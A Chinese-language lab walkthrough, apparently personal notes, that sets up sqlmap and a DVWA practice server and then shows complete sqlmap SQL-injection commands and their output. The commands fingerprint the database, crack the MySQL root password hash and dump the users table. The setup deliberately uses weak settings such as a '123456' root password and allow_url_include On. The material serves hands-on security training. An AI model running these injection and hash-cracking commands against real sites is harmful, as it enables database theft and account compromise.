yum install python -y python -V tar zxvf sqlmapproject-sqlmap-1.2.11-13-gabb911d.tar.gz cd sqlmapproject-sqlmap-abb911d/ sqlmapproject-sqlmap-7eab1bc]# ls doc lib procs shell sqlmap.conf tamper txt waf extra plugins README.md sqlmapapi.py sqlmap.py thirdparty udf xml
3、運行sqlmap
[root@localhost sqlmapproject-sqlmap-abb911d]# ./sqlmap.py
4、創建一個slqmap軟件鏈接
ln -s /root/sqlmapproject-sqlmap-abb911d/sqlmap.py /usr/bin/sqlmap
sqlmap -h #可以彈出幫助信息,說明安裝成了
5.安裝網站程序
yum install -y httpd php php-mysql php-gd mariadb-server mariadb mysql systemctl start httpd && systemctl enable httpd systemctl start mariadb && systemctl enable mariadb
3、測試LAMP環境:
[root@xuegod63 ~]# vim /var/www/html/test.php
<?php
phpinfo();
?>
http://45.115.243.24/index.php
4、配置mysql數據root用戶密碼:
mysqladmin -u root password "123456" mysql -u root -p123456
5、將下載的dvwa滲透系統代碼上傳到Linux上,並解壓到網站根目錄下
unzip -d /var/www/html/ DVWA-master.zip ls /var/www/html/ DVWA-master test.php chown apache:apache /var/www/html/DVWA-master/ -R
6、編輯DVAW配置文件/dvwa/config/config.inc.php,配置數據庫信息,user和password是MySQL的用戶名和密碼。
vi /var/www/html/DVWA-master/config/config.inc.php.dist vi /var/www/html/DVWA-master/config/config.inc.php 修改的地方如下: $_DVWA[ 'db_server' ] = '127.0.0.1'; $_DVWA[ 'db_database' ] = 'dvwa'; $_DVWA[ 'db_user' ] = 'root'; $_DVWA[ 'db_password' ] = '123456'; #只需要修改成你的mysql的root用戶密碼 cp /var/www/html/DVWA-master/config/config.inc.php.dist /var/www/html/DVWA-master/config/config.inc.php http://45.115.243.24/DVWA-master/setup.php 報錯修改 vi /etc/php.ini 改:815 allow_url_include = Off 為: allow_url_include = On systemctl restart httpd [root@xuegod63 ~]# vi /var/www/html/DVWA-master/config/config.inc.php 改: 26 $_DVWA[ 'recaptcha_public_key' ] = ''; 27 $_DVWA[ 'recaptcha_private_key' ] = ''; 為: $_DVWA[ 'recaptcha_public_key' ] = '6LdK7xITAAzzAAJQTfL7fu6I-0aPl8KHHieAT_yJg'; $_DVWA[ 'recaptcha_private_key' ] = '6LdK7xITAzzAAL_uw9YXVUOPoIHPZLfw2K1n5NVQ'; http://45.115.243.24/DVWA-master/login.php admin和password
注入
sqlmap -h
http://45.115.243.24/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#
o6fb5ftgc8baogcra5u8786571
low
sqlmap -u "http://45.115.243.24/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit" --cookie="security=low; PHPSESSID=o6fb5ftgc8baogcra5u8786571" -b --current-db --current-user
Y #已經識別出來為mysql,現在直接跳過,不再掃描其他類型的數據庫
n #這里寫n 如果有想測試一些mysql其他值,就先Y,寫Y測試時間比較長。
GET parameter[y/N]N
web server operating system: Linux CentOS 7-1708
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
banner: '5.5.60-MariaDB'
[20:17:55] [INFO] fetching current user
current user: 'root@localhost'
[20:17:55] [INFO] fetching current database
current database: 'dvwa'
[20:17:55] [INFO] fetched data logged to text files under '/root/.sqlmap/output/45.115.243.24'
sqlmap -u "http://45.115.243.24/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit" --cookie="security=low; PHPSESSID=o6fb5ftgc8baogcra5u8786571" -b --string="Surname" --users --password
每行彈出的含意:
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]y
temporary [ˈtemprəri] 臨時的
eventual [ɪˈventʃuəl] 最終發生的
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y 基於字典的攻擊取回密碼哈希值?
[1] default dictionary file '/root/sqlmapproject-sqlmap-abb911d/txt/wordlist.zip' (press Enter) #回車
[20:29:58] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[20:30:01] [INFO] starting dictionary-based cracking (mysql_passwd)
[20:30:01] [INFO] starting 8 processes
[20:30:01] [INFO] cracked password '123456' for user 'root'
database management system users password hashes:
[*] root [2]:
password hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
clear-text password: 123456
sqlmap -u "http://45.115.243.24/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit" --cookie="security=low; PHPSESSID=o6fb5ftgc8baogcra5u8786571" -D dvwa --tables
sqlmap -u "http://45.115.243.24/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit" --cookie="security=low; PHPSESSID=o6fb5ftgc8baogcra5u8786571" -D dvwa -T users --columns
sqlmap -u "http://45.115.243.24/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit" --cookie="security=low; PHPSESSID=o6fb5ftgc8baogcra5u8786571" -D dvwa -T users -C user,password --dump